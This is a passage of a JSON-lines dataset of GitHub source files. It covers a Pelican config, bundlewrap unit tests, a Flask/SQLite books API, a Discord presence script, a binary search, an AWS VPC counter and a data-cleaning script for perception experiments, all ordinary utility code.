split[1]\n logging.info('Fetching data. Market: %s, Symbol: %s, Company Name: %s', market, symbol, name)\n create_or_update_stock(symbol, name, market)\n logging.info('Finished parsing %s file.', market)\n\n\n","repo_name":"grantbachman/chartflux2","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33067211861","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'Sarah Bird'\nSITENAME = u'Bokeh Cookbook'\nSITEURL = 'http://bokeh-cookbook.github.io'\nTITLE = 'Bokeh Cookbook'\nSUBTITLE = 'Recipes, tips & tricks for using & developing bokeh'\n\nPATH = 'content'\n\nTHEME = 'theme/'\nTIMEZONE = 'UTC'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\nFEED_RSS = 'feeds/all.rss.xml'\n\nDEFAULT_PAGINATION = 10\n\nPLUGIN_PATHS = [\"plugins\"]\nPLUGINS = [\"page_hierarchy\", \"ipynb.markup\"]\nIGNORE_FILES = ['.ipynb_checkpoints']\n\nPAGE_URL = '{slug}/'\nPAGE_SAVE_AS = '{slug}/{slug}.html'\nSLUGIFY_SOURCE = 'basename'\n\nSTATIC_PATHS = ['assets']\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n\n# ipynb plugin\nMARKUP = ('md', 'ipynb')\n\nARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'\nARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'\n\nSUMMARY_MAX_LENGTH = 10\n","repo_name":"bokeh-cookbook/bokeh-cookbook","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"13177015604","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom unittest import TestCase\n\ntry:\n from unittest.mock import MagicMock, patch\nexcept ImportError:\n from mock import MagicMock, patch\n\nfrom bundlewrap.items import Item\nfrom bundlewrap.exceptions import BundleError\n\n\nclass MockItem(Item):\n BUNDLE_ATTRIBUTE_NAME = \"mock\"\n ITEM_TYPE_NAME = \"type1\"\n NEEDS_STATIC = []\n\n\nclass ApplyTest(TestCase):\n \"\"\"\n Tests bundlewrap.items.Item.apply.\n \"\"\"\n def test_noninteractive(self):\n status_before = MagicMock()\n status_before.correct = False\n status_before.skipped = False\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.get_status = MagicMock(return_value=status_before)\n item.fix = MagicMock()\n item.apply(interactive=False)\n self.assertEqual(item.fix.call_count, 1)\n self.assertEqual(item.get_status.call_count, 2)\n\n @patch('bundlewrap.items.ask_interactively', return_value=True)\n def test_interactive(self, ask_interactively):\n status_before = MagicMock()\n status_before.correct = False\n status_before.fixable = True\n status_before.skipped = False\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.get_status = MagicMock(return_value=status_before)\n item.ask = MagicMock(return_value=\"?\")\n item.fix = MagicMock()\n item.apply(interactive=True)\n self.assertEqual(item.fix.call_count, 1)\n assert ask_interactively.call_count == 1\n\n @patch('bundlewrap.items.ask_interactively', return_value=False)\n def test_interactive_abort(self, ask_interactively):\n status_before = MagicMock()\n status_before.correct = False\n status_before.fixable = True\n status_before.skipped = False\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.get_status = MagicMock(return_value=status_before)\n item.ask = MagicMock(return_value=\"?\")\n item.fix = MagicMock()\n result = item.apply(interactive=True)\n self.assertFalse(item.fix.called)\n assert ask_interactively.call_count == 1\n self.assertEqual(result, Item.STATUS_SKIPPED)\n\n def test_correct(self):\n status_before = MagicMock()\n status_before.correct = True\n status_before.skipped = False\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.get_status = MagicMock(return_value=status_before)\n item.fix = MagicMock()\n result = item.apply()\n self.assertFalse(item.fix.called)\n self.assertEqual(result, Item.STATUS_OK)\n\n def test_unless(self):\n status_before = MagicMock()\n status_before.correct = False\n status_before.skipped = False\n item = MockItem(\n MagicMock(),\n \"item1\",\n {'unless': \"true\"},\n skip_validation=True,\n )\n item.get_status = MagicMock(return_value=status_before)\n item.fix = MagicMock()\n\n run_result = MagicMock()\n run_result.return_code = 0\n item.node.run.return_value = run_result\n\n result = item.apply()\n self.assertFalse(item.fix.called)\n self.assertEqual(result, Item.STATUS_SKIPPED)\n\n def test_unless_fails(self):\n status_before = MagicMock()\n status_before.correct = False\n status_before.skipped = False\n item = MockItem(\n MagicMock(),\n \"item1\",\n {'unless': \"false\"},\n skip_validation=True,\n )\n item.get_status = MagicMock(return_value=status_before)\n item.fix = MagicMock()\n\n run_result = MagicMock()\n run_result.return_code = 1\n item.node.run.return_value = run_result\n\n item.apply()\n self.assertTrue(item.fix.called)\n\nclass InitTest(TestCase):\n \"\"\"\n Tests initialization of bundlewrap.items.Item.\n \"\"\"\n @patch('bundlewrap.items.Item._validate_attribute_names')\n @patch('bundlewrap.items.Item._validate_required_attributes')\n @patch('bundlewrap.items.Item.validate_attributes')\n def test_init_no_validation(self, validate_names, validate_required,\n validate_values):\n bundle = MagicMock()\n i = MockItem(bundle, \"item1\", {}, skip_validation=True)\n self.assertEqual(i.bundle, bundle)\n self.assertEqual(i.name, \"item1\")\n self.assertFalse(validate_names.called)\n self.assertFalse(validate_required.called)\n self.assertFalse(validate_values.called)\n\n @patch('bundlewrap.items.Item._validate_attribute_names')\n @patch('bundlewrap.items.Item._validate_required_attributes')\n @patch('bundlewrap.items.Item.validate_attributes')\n def test_init_with_validation(self, validate_names, validate_required,\n validate_values):\n MockItem(MagicMock(), MagicMock(), {}, skip_validation=False)\n self.assertTrue(validate_names.called)\n self.assertTrue(validate_required.called)\n self.assertTrue(validate_values.called)\n\n def test_attribute_name_validation_ok(self):\n MockItem.ITEM_ATTRIBUTES = {'foo': 47, 'bar': 48}\n MockItem._validate_attribute_names(MagicMock(), \"item:id\", {'foo': 49, 'needs': []})\n\n def test_attribute_name_validation_fail(self):\n item = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.ITEM_ATTRIBUTES = {'foo': 47, 'bar': 48}\n with self.assertRaises(BundleError):\n item._validate_attribute_names(\n MagicMock(),\n \"item:id\",\n {\n 'foobar': 49,\n 'bar': 50,\n 'needs': [],\n },\n )\n\n def test_name_validation_fail(self):\n with self.assertRaises(BundleError):\n MockItem._validate_name(\n MagicMock(),\n \"my:bad_name\",\n )\n\n def test_required_attributes(self):\n class ReqMockItem(MockItem):\n REQUIRED_ATTRIBUTES = ['foo', 'bar', 'baz']\n\n item = ReqMockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item.ITEM_ATTRIBUTES = {'foo': 47, 'bar': 48}\n with self.assertRaises(BundleError):\n item._validate_required_attributes(\n MagicMock(),\n \"item:id\",\n {\n 'foobar': 49,\n 'bar': 50,\n 'needs': [],\n },\n )\n\n def test_subclass_attributes(self):\n class MyItem(MockItem):\n ITEM_ATTRIBUTES = {'foo': 47, 'bar': 48}\n\n i = MyItem(MagicMock(), MagicMock(), {'foo': 49})\n self.assertEqual(i.attributes, {'foo': 49, 'bar': 48})\n\n\nclass BundleCollisionTest(TestCase):\n \"\"\"\n Tests bundlewrap.items.__init__.Item._check_bundle_collisions.\n \"\"\"\n def test_collision(self):\n item1 = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item2 = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n with self.assertRaises(BundleError):\n item1._check_bundle_collisions([item1, item2])\n\n def test_no_collision(self):\n item1 = MockItem(MagicMock(), \"item1\", {}, skip_validation=True)\n item2 = MockItem(MagicMock(), \"item2\", {}, skip_validation=True)\n item1._check_bundle_collisions([item1, item2])\n","repo_name":"sq3/bundlewrap","sub_path":"tests_legacy/unit/items/item_tests.py","file_name":"item_tests.py","file_ext":"py","file_size_in_byte":7390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"} +{"seq_id":"40582627925","text":"# -*- coding: utf-8 -*-\r\n# __author__ = 'zzg'\r\n\r\nfrom bson.objectid import ObjectId\r\nimport datetime\r\nimport json\r\nimport os\r\nimport re\r\nimport pickle\r\nimport unittest\r\nimport pandas as pd\r\nfrom mbio.api.database.whole_transcriptome.api_base import ApiBase\r\n\r\n\r\nclass CorHeatmap(ApiBase):\r\n def __init__(self, bind_object):\r\n super(CorHeatmap, self).__init__(bind_object)\r\n self._project_type = 'tool_lab'\r\n\r\n def add_corheatmap(self, CorHeatmap_path, project_sn='tool_lab', main_id=None, task_id='tool_lab', params=None):\r\n if main_id is None:\r\n name = \"corheatmap\"+'_'\r\n time_now = datetime.datetime.now()\r\n name += time_now.strftime(\"%Y%m%d_%H%M%S\")\r\n main_info = dict(\r\n project_sn=project_sn,\r\n task_id=task_id,\r\n version=\"v2\",\r\n name=name,\r\n created_ts=time_now.strftime('%Y-%m-%d %H:%M:%S'),\r\n desc='corheatmap',\r\n params= params if params else \"null\",\r\n status=\"start\",\r\n )\r\n main_id = self.create_db_table('sg_cor_heatmap', [main_info])\r\n else:\r\n main_id = ObjectId(main_id)\r\n\r\n if type(main_id) == str or type(main_id) == bytes or type(main_id) == unicode:\r\n main_id = ObjectId(main_id)\r\n\r\n if os.path.exists(CorHeatmap_path + \"/correlation_spearmanr.xls\"):\r\n correction_file = CorHeatmap_path + \"/correlation_spearmanr.xls\"\r\n pvalue_file = CorHeatmap_path + \"/pvalue_spearmanr.xls\"\r\n else:\r\n correction_file = CorHeatmap_path + \"/correlation_pearsonr.xls\"\r\n pvalue_file = CorHeatmap_path + \"/pvalue_pearsonr.xls\"\r\n\r\n if os.path.exists(CorHeatmap_path + \"/row_tree.tre\"):\r\n with open(CorHeatmap_path + \"/row_tree.tre\") as f:\r\n row_tree = f.readline().strip()\r\n row_tree_list = re.findall('[(,]([^(]*?):', row_tree)\r\n tree_info_row = dict(\r\n name=\"row_tree\",\r\n direction=\"h\",\r\n data=row_tree,\r\n type=\"tree\",\r\n cor_id=main_id,\r\n )\r\n self.create_db_table('sg_cor_heatmap_detail', [tree_info_row])\r\n if os.path.exists(CorHeatmap_path + \"/column_tree.tre\"):\r\n with open(CorHeatmap_path + \"/column_tree.tre\") as f:\r\n column_tree = f.readline().strip()\r\n column_tree_list = re.findall('[(,]([^(]*?):', column_tree)\r\n tree_info_column = dict(\r\n name=\"column_tree\",\r\n direction=\"v\",\r\n data=column_tree,\r\n type=\"tree\",\r\n cor_id=main_id,\r\n )\r\n self.create_db_table('sg_cor_heatmap_detail', [tree_info_column])\r\n \"\"\"\r\n column_tree_new_name = []\r\n column_tree_name_dict = {}\r\n for i in range(len(column_tree_list)):\r\n column_tree_new_name.append(\"name\" + str(i + 1))\r\n column_tree_name_dict[\"name\" + str(i + 1)] = column_tree_list[i]\r\n column_name = json.dumps(column_tree_name_dict)\r\n \"\"\"\r\n column_name = []\r\n with open(correction_file,\"r\") as h:\r\n a = h.readlines()\r\n for i in range(len(a[1:])):\r\n column_name.append(a[i+1].strip(\"\\n\").split(\"\\t\")[0])\r\n df1 = pd.read_table(correction_file, index_col=0, sep='\\t')\r\n df_cor1 = df1.reindex(column_name)\r\n #df_cor.index = column_name\r\n df_cor = df_cor1.reset_index()\r\n df_cor['cor_id'] = main_id\r\n df_cor['type'] = 'heatmap'\r\n #df_cor['name'] = column_tree_new_name\r\n self.create_db_table('sg_cor_heatmap_detail', df_cor.to_dict('r'))\r\n df2 = pd.read_table(pvalue_file, index_col=0, sep='\\t')\r\n df_pva1 = df2.reindex(column_name)\r\n #df_pva.index = column_tree_new_name\r\n df_pva = df_pva1.reset_index()\r\n df_pva['cor_id'] = main_id\r\n df_pva['type'] = 'heatmap_asterisk'\r\n #df_pva['name'] = column_tree_new_name\r\n self.create_db_table('sg_cor_heatmap_detail', df_pva.to_dict('r'))\r\n '''\r\n heatmap_data = {\"heatmap_data\": [{\"name\": \"name\", \"data\": row_name}],\r\n \"condition\": {\"type\": \"heatmap\"}}\r\n heatmap_asterisk_data = {\"heatmap_asterisk_data\": [{\"name\": \"sample_name\", \"data\": row_name}],\r\n \"condition\": {\"type\": \"heatmap_asterisk\"}}\r\n tree_data = {\"tree_data\": [{\"name\": \"tree_name\"}],\r\n \"condition\": {\"type\": \"tree \"}}\r\n heatmap_data_info = json.dumps(heatmap_data, sort_keys=False, separators=(',', ':'))\r\n heatmap_asterisk_data_info = json.dumps(heatmap_asterisk_data, sort_keys=False, separators=(',', ':'))\r\n tree_data_info = json.dumps(tree_data, sort_keys=False, separators=(',', ':'))\r\n '''\r\n with open(correction_file,\"r\") as h:\r\n a = h.readlines()\r\n row_name = a[0].strip(\"\\n\").split(\"\\t\")[1:]\r\n row_name.insert(0,\"name\")\r\n heatmap_data = dict(name='name', data=row_name, condition={'type': 'heatmap'})\r\n heatmap_data = json.dumps(heatmap_data)\r\n heatmap_asterisk_data = dict(name='name', data=row_name, condition={'type': 'heatmap_asterisk'})\r\n heatmap_asterisk_data = json.dumps(heatmap_asterisk_data)\r\n tree_data = dict(name='tree_name',condition={'type': 'tree'})\r\n tree_data = json.dumps(tree_data)\r\n self.update_db_record('sg_cor_heatmap', main_id, status=\"end\", main_id=main_id, heatmap_data=heatmap_data, heatmap_asterisk_data=heatmap_asterisk_data, tree_data=tree_data,) #column_name=column_tree_name_dict,\r\n return main_id\r\n","repo_name":"bensonlew/rnawl","sub_path":"src/mbio/api/database/tool_lab/cor_heatmap.py","file_name":"cor_heatmap.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"37588647165","text":"from pypresence import Presence\nimport time\nimport sys, os, subprocess\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--delay', type=int, default=5, help='Delay value')\nparser.add_argument('--fmt', type=str, default=\"{{artist}} - {{title}}\", help='playerctl format string')\nparser.add_argument('--player', type=str, default=\"firefox\", help='Player name to detect')\nparser.add_argument('--displayer', type=str, default=\"firefox\", help='Player name to show to the client')\nparser.add_argument('--icon', type=str, default=\"\", help='Icon to use. [Currently supported: kde, firefox, chromium, vlc]')\nparser.add_argument('--client', type=int, default=1142046335017685072, help='Discord client ID')\n\nargs = parser.parse_args()\ndelay = args.delay\nplayer = args.player\ndisplayer = args.displayer\nicon = args.icon\nfmt = args.fmt\nclient_id = args.client\n\nprint(f\"Connecting to discord via {client_id} / DELAY {delay} / PLAYER {player} ({displayer}) / ICON {icon} / FMT {fmt}\")\nRPC = Presence(client_id) # Initialize the client class\nRPC.connect() # Start the handshake loop\n\nlast_details = \"\"\n\nwhile True: \n details = \"\"\n \n try:\n output = subprocess.check_output([\"playerctl\", \"metadata\", \"--format\", fmt, \"-p\", player])\n details = output.decode(\"utf-8\").strip()\n except subprocess.CalledProcessError:\n details = \"No media playing\"\n \n if details != last_details:\n d = RPC.update(state=f\"Playing in {displayer}\", details=f\"{details}\", large_image=\"infinity-transparent\", large_text=\"Designed by @_technomancer\", small_image=icon, small_text=displayer, start=time.time(), buttons=[{\"label\": \"Source\", \"url\": \"https://github.com/technomancy7/synthlink\"}])\n update = d['data']\n print(f\"state update @ {update['name']}: {update['state']} / {update['details']}\")\n last_details = details\n \n time.sleep(delay)\n","repo_name":"technomancy7/synthlink","sub_path":"synthlink.py","file_name":"synthlink.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20131566759","text":"'''\n@author: etekinalp\n@date: Aug 26, 2014\n@mail: e.tekinalp@icloud.com\n@brief: This module setups a plugin\n'''\n\n\nfrom maya import cmds, mel\nfrom goe_plugins import plugin_master\nreload(plugin_master)\n\n\nclass Plug(plugin_master.PluginSetup):\n \"\"\"\n Subclass PluginSetup and setup the plugin test environment.\n \"\"\"\n\n def __init__(self, plugin, name):\n \"\"\"\n @param plugin(string): Plugin name without .so or .py suffix\n @param name(string): Name of plugin call\n \"\"\"\n\n super(Plug, self).__init__(plugin, 'so', True, True)\n\n # args\n self.plugin = plugin\n self.name = name\n\n # methods\n self._setup_plugin()\n # END __init__()\n\n def _setup_plugin(self):\n plg = cmds.createNode(self.name)\n for i in range(10):\n obja = cmds.polyCube()[0]\n objb = cmds.polySphere()[0]\n cmds.connectAttr('%s.worldMatrix' % obja,\n '%s.input[%d].inMatrix' % (plg, i))\n cmds.connectAttr('%s.output[%d].outTranslate' % (plg, i),\n '%s.t' % objb)\n cmds.connectAttr('%s.output[%d].outRotate' % (plg, i),\n '%s.r' % objb)\n #cmds.connectAttr('%s.output[0].outScale' % plg, '%s.s' % objb)\n cmds.setAttr('%s.input[%d].constraint' % (plg, i), 2)\n # END _setup_plugin()\n# END Plug()\n\nPlug(\"multiconstraint\", \"multiConstraint\")\n","repo_name":"EmreTekinalp/Public","sub_path":"src/python/tool/autorigger_v02_obsolete/__obsolete_rig_system/goe_plugins/goe_multiconstraint.py","file_name":"goe_multiconstraint.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30224277199","text":"from flask import Flask,request,jsonify\r\nimport sqlite3\r\napp = Flask(__name__)\r\n\r\n\r\ndef dict_factory(cursor, row):\r\n d = {}\r\n for idx, col in enumerate(cursor.description):\r\n d[col[0]] = row[idx]\r\n return d\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return \"An api for all the books \"\r\n\r\n\r\n@app.route('/api/v1/resources/books/all', methods=['GET'])\r\ndef api_all():\r\n conn = sqlite3.connect('books.db')\r\n conn.row_factory = dict_factory\r\n cur = conn.cursor()\r\n all_books = cur.execute('SELECT * FROM books;').fetchall()\r\n return jsonify(all_books)\r\n\r\n@app.route('/api/v1/resources/books')\r\ndef api_filter():\r\n query_parameters = request.args\r\n id = query_parameters.get('id')\r\n published = query_parameters.get('published')\r\n author = query_parameters.get('author')\r\n\r\n query = 'SELECT * FROM books WHERE '\r\n to_filter = []\r\n if id:\r\n query = query + 'id=? AND '\r\n to_filter.append(id)\r\n\r\n if published:\r\n query = query + 'published=? AND '\r\n to_filter.append(published)\r\n\r\n if author:\r\n query = query + 'author=? AND '\r\n to_filter.append(author)\r\n\r\n query = query[:-4] + ';'\r\n\r\n conn = sqlite3.connect('books.db')\r\n conn.row_factory = dict_factory\r\n cur = conn.cursor()\r\n result = cur.execute(query,to_filter).fetchall()\r\n\r\n return jsonify(result)\r\n\r\n\r\n\r\n\r\n\r\napp.run()\r\n","repo_name":"LaxmishShetty/flask_restful_books","sub_path":"api/api_final.py","file_name":"api_final.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"74872546187","text":"# Observations:\n# * The item list must be sorted;\n# * Returns the position of the item in the list;\n#\n#\n#\n# LEFT MIDDLE RIGHT\n# \\/ \\/ \\/\n# indexes: [0] [1] [2] [3] [4] [5] [6] [7] [8]\n# |--------------------------------------------|\n# values: | 20 | 23 | 25 | 28 | 35 | 36 | 40 | 41 | 42 |\n# |--------------------------------------------|\n#\n#\n# Running Time:\n# * Best-case O(1)\n# * Average O(log n)\n# * Worst-case O(log n)\n#\n\nfrom typing import List, Optional, TypeVar\n\nT = TypeVar(\"T\", int, str)\n\n\ndef binary_search_recursive(\n list_of_items: List[T], target: T, left: int, right: int\n) -> Optional[int]:\n if left >= right:\n return None\n\n middle = left + (right - left) // 2 # Position of the MIDDLE item on the list.\n\n guess = list_of_items[middle]\n if guess > target: # The guess was TOO HIGH.\n return binary_search_recursive(list_of_items, target, left, middle)\n elif guess < target: # The guess was TOO LOW.\n return binary_search_recursive(list_of_items, target, middle + 1, right)\n else: # Found the target item in the MIDDLE.\n return middle\n","repo_name":"Leonardofreua/python-algorithms-practice","sub_path":"searching/binary_search_recursive.py","file_name":"binary_search_recursive.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"1936145919","text":"import boto3\nfrom credential import *\n\ndef vpc_counts(account):\n # AWS Session 설정\n session = aws_credential(account)\n\n # EC2 client 생성\n ec2 = session.client('ec2')\n\n # VPC 이름 리스트 생성\n vpc_name_list = []\n\n # VPC 상태 리스트 생성\n vpc_state_list = []\n\n # VPC 목록 및 개수 가져오기\n vpcs = ec2.describe_vpcs()\n vpc_count = len(vpcs['Vpcs'])\n\n # VPC 개수 및 목록 출력\n for vpc in vpcs['Vpcs']:\n vpc_name_list.append(vpc['VpcId'])\n vpc_state_list.append(vpc['State'])\n\n vpc_name_list_str = \"\\n\".join([f\"{vpc_name} \" for vpc_name in vpc_name_list])\n vpc_state_list_str = \"\\n\".join([f\"{vpc_state} \" for vpc_state in vpc_state_list])\n\n return vpc_count, vpc_name_list_str, vpc_state_list_str","repo_name":"wjsgur8530/aws_slack_chatops","sub_path":"vpc.py","file_name":"vpc.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30693171102","text":"import os\nimport sys\nimport pymongo\nimport numpy as np\nimport pandas as pd\nfrom random import shuffle\n\n\"\"\"\nCleaning data:\n1. Filter everyone who failed attention checks\n2. Filter everyone who didn't finish the experiment(?)\n2b. Filter people who finished way too quickly?\n3. Drop nans\n4. Drop unneeded columns, rename other columns to be more standardized\n5. Create new collection with cleaned data\n\"\"\"\n\nconn = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = conn[\"mlve_outputs\"]\n\nexperiments = [\n 'gestalt_shapegen-depth-estimation-pilot',\n 'gestalt_shapegen-depth-estimation-split-half',\n 'gestalt_shapegen-segmentation-split-half',\n 'gestalt_shapegen-surface-normals',\n 'gestalt_shapegen-surface-normals-split-half',\n 'hypersim_surface-normals',\n 'hypersim_surface-normals-splithalf',\n 'hypersim_v2-depth-estimation-pilot',\n 'hypersim_v3-depth-estimation-split-half',\n 'hypersim_v3-segmentation-split-half',\n 'hypersim_v3-surface-normals',\n 'nsd-depth-estimation-pilot',\n 'nsd-segmentation',\n 'nsd-surface-normals',\n 'nsd_surface-normals',\n 'tdw-depth-estimation-pilot',\n 'tdw-depth-estimation-split-half',\n 'tdw-segmentation',\n 'tdw-segmentation-split-half',\n 'tdw-surface-normals-split-half',\n 'tdw_surface-normals']\n\ndepth_experiments = [\n'tdw-depth-estimation-split-half',\n'tdw-depth-estimation-pilot',\n'hypersim_v2-depth-estimation-pilot',\n'hypersim_v3-depth-estimation-split-half',\n'nsd-depth-estimation-pilot',\n'gestalt_shapegen-depth-estimation-pilot',\n'gestalt_shapegen-depth-estimation-split-half',\n]\n\nsegmentation_experiments = [\n'hypersim_v3-segmentation-split-half',\n'nsd-segmentation',\n'gestalt_shapegen-segmentation-split-half',\n'tdw-segmentation',\n'tdw-segmentation-split-half',\n]\n\nsurface_normals_experiments = [\n'nsd_surface-normals',\n'nsd-surface-normals',\n'hypersim_surface-normals-splithalf',\n'hypersim_surface-normals',\n'hypersim_v3-surface-normals',\n'tdw_surface-normals',\n'tdw-surface-normals-split-half',\n'gestalt_shapegen-surface-normals-split-half',\n'gestalt_shapegen-surface-normals',\n]\n\n\"\"\"\nTODO: \n- For each experiment, filter out people who failed attention checks\n- For each experiment, filter out people who didn't finish?\n- Filter people who finished way too quickly?\n- For each experiment, drop nans\n- Drop irrelevant columns (ie; keep userID, metadata, gt if exists, response, response time?, probe locations, batchID?)\n- Combine nsd-surface-normals experiments\n- Aggregate results for split halfs and pilots / large scale experiments\n- Store in csvs\n- Write to mongo?\n\"\"\"\n\ndef load_experiment(exp_name):\n col = db[exp_name]\n records = []\n count = 0\n for record in col.find({}):\n records.append(record)\n count += 1\n \n print(f\"Returning {count} records for {exp_name}\")\n df = pd.DataFrame(records)\n return df\n\ndef unit_vector(vector):\n \"\"\" Returns the unit vector of the vector. \"\"\"\n return vector / np.linalg.norm(vector)\n\ndef angular_dist(v1, v2, use_degrees=True):\n \"\"\" Returns the angle in radians between vectors 'v1' and 'v2':\n \"\"\"\n if v1 == [] or v2 == [] or v1 == None or v2 == None or \\\n (type(v1) == list and len(v1) > 0 and (v1[0] == None or np.isnan(v1[0]))) or \\\n (type(v2) == list and len(v2) > 0 and (v2[0] == None or np.isnan(v2[0]))):\n return None\n\n v1_u = unit_vector(v1)\n v2_u = unit_vector(v2)\n radians = np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))\n degrees = np.degrees(radians)\n if np.any(np.isnan(degrees)):\n return None\n \n if not use_degrees:\n return radians\n else:\n return degrees\n\ndef filter_attention_checks(df, experiment_type):\n attention_key = [x for x in df.columns if \"attention\" in x.lower()][0] \n attention_checks = df[df[attention_key] == True]\n if len(attention_checks.isna().sum()) > len(attention_checks) / 4:\n return df\n\n drop_ids = []\n if experiment_type == \"surface-normals\":\n attention_checks[\"angular_error\"] = attention_checks.apply(lambda x: angular_dist(x[\"indicatorFinalDirection\"], x[\"trueArrowDirection\"]), axis=1)\n for user, att_trials in attention_checks.groupby(\"userID\"):\n if att_trials[\"angular_error\"].mean() > 60:\n drop_ids.append(user)\n \n elif experiment_type == \"depth\":\n for user, att_trials in attention_checks.groupby(\"userID\"):\n if att_trials[\"correct\"].mean() < 0.5:\n drop_ids.append(user)\n\n elif experiment_type == \"segmentation\":\n if \"segmentation_correct\" in df.columns:\n correct_key = \"segmentation_correct\"\n else:\n correct_key = \"correct\"\n for user, att_trials in attention_checks.groupby(\"userID\"):\n if att_trials[correct_key].mean() < 0.5:\n drop_ids.append(user)\n\n df = df.drop(attention_checks.index)\n df = df[~df[\"userID\"].isin(drop_ids)]\n return df\n\ndef filter_incomplete(df):\n incomplete = []\n # count max number of times a specific user ID has shown up\n total_trials = int(df[\"userID\"].value_counts().median())\n for user, trials in df.groupby(\"userID\"):\n if len(trials) < total_trials:\n incomplete.append(user)\n\n df = df[~df[\"userID\"].isin(incomplete)]\n return df\n\ndef filter_by_time(df):\n if df[\"time_elapsed\"].isna().sum() > len(df) / 4:\n # If more than 25% of response times are missing, don't filter\n return df\n too_fast = []\n mean_response_time = df.groupby(\"userID\")[\"time_elapsed\"].max().mean() # mean response time for whole experiment\n response_time_std = df.groupby(\"userID\")[\"time_elapsed\"].max().std() \n for user, trials in df.groupby(\"userID\"):\n if trials[\"time_elapsed\"].max() < mean_response_time - response_time_std or \\\n trials[\"time_elapsed\"].max() > mean_response_time + (response_time_std * 2):\n too_fast.append(user)\n \n df = df[~df[\"userID\"].isin(too_fast)]\n return df\n\ndef drop_duplicates(df):\n is_duplicate = [x for x in df.columns if \"duplicate\" in x.lower()][0]\n df = df[df[is_duplicate] == False]\n return df\n\ndef obscure_ids(df):\n def shuffle(x):\n x = list(x)\n np.random.shuffle(x)\n return ''.join(x)\n shuffled = {}\n for userID in df[\"userID\"].unique():\n shuffled[userID] = shuffle(userID)\n \n df[\"ID\"] = df[\"userID\"].apply(lambda x: shuffled[x])\n\n return df\n\ndef filter_cols(df, experiment_type):\n \"\"\"\n Obscures IDs, standardizes naming schemes for columns, and drops irrelevant columns\n \"\"\"\n df = obscure_ids(df)\n \n # Rename columns\n batch_key = [x for x in df.columns if \"batch\" in x.lower()][0]\n meta_key = [x for x in df.columns if \"meta\" in x.lower()][0]\n if experiment_type == \"surface-normals\":\n angular_error = df.apply(lambda x: angular_dist(x[\"indicatorFinalDirection\"], x[\"trueArrowDirection\"]), axis=1)\n df[\"score\"] = angular_error\n df = df.drop(columns=[\"response\"])\n\n rename = {\"indicatorFinalDirection\": \"response\", \n \"trueArrowDirection\": \"gt\", \n \"arrowPixelPosition\": \"probeLocation\",\n batch_key: \"batchID\", \n meta_key: \"metadata\",\n }\n df.rename(columns=rename, inplace=True)\n\n elif experiment_type == \"segmentation\":\n if \"segmentation_correct\" in df.columns:\n correct_key = \"segmentation_correct\"\n response_key = \"segmentation_response\"\n df = df.drop(columns=[\"response\"])\n else:\n correct_key = \"correct\"\n response_key = \"response\"\n rename = {correct_key: \"score\", \n \"sameObj\": \"gt\", \n response_key: \"response\",\n batch_key: \"batchID\",\n meta_key: \"metadata\", \n \"probe_locations\": \"probeLocation\"\n }\n df = df.rename(columns=rename)\n \n elif experiment_type == \"depth\":\n if \"depth_correct\" in df.columns:\n correct_key = \"depth_correct\"\n response_key = \"depth_response\"\n df = df.drop(columns=[\"response\"])\n else:\n correct_key = \"correct\"\n response_key = \"response\" \n rename = {correct_key: \"score\", \n \"gtDepths\": \"gt\", \n response_key: \"response\",\n batch_key: \"batchID\",\n meta_key: \"metadata\", \n \"probe_locations\": \"probeLocation\"\n }\n df = df.rename(columns=rename)\n if not \"gt\" in df.columns:\n df[\"gt\"] = None\n df[\"score\"] = None\n\n # Drop irrelevant columns \n # ID: Obscured user ID, imageURL: url, gt: ground truth if exists, response: user response, score: correctness score, batchID: batch ID\n df = df[[\"ID\", \"imageURL\", \"gt\", \"response\", \"score\", \"probeLocation\", \"batchID\", \"expName\", \"iterationName\"]]\n # Drop rows where response is NaN\n df = df.dropna(subset=[\"response\"])\n print(df.info())\n\n return df\n\ndef filter_df(df, experiment_type):\n print(\"Total records: \", len(df))\n # Filter anyone who failed attention checks\n df = 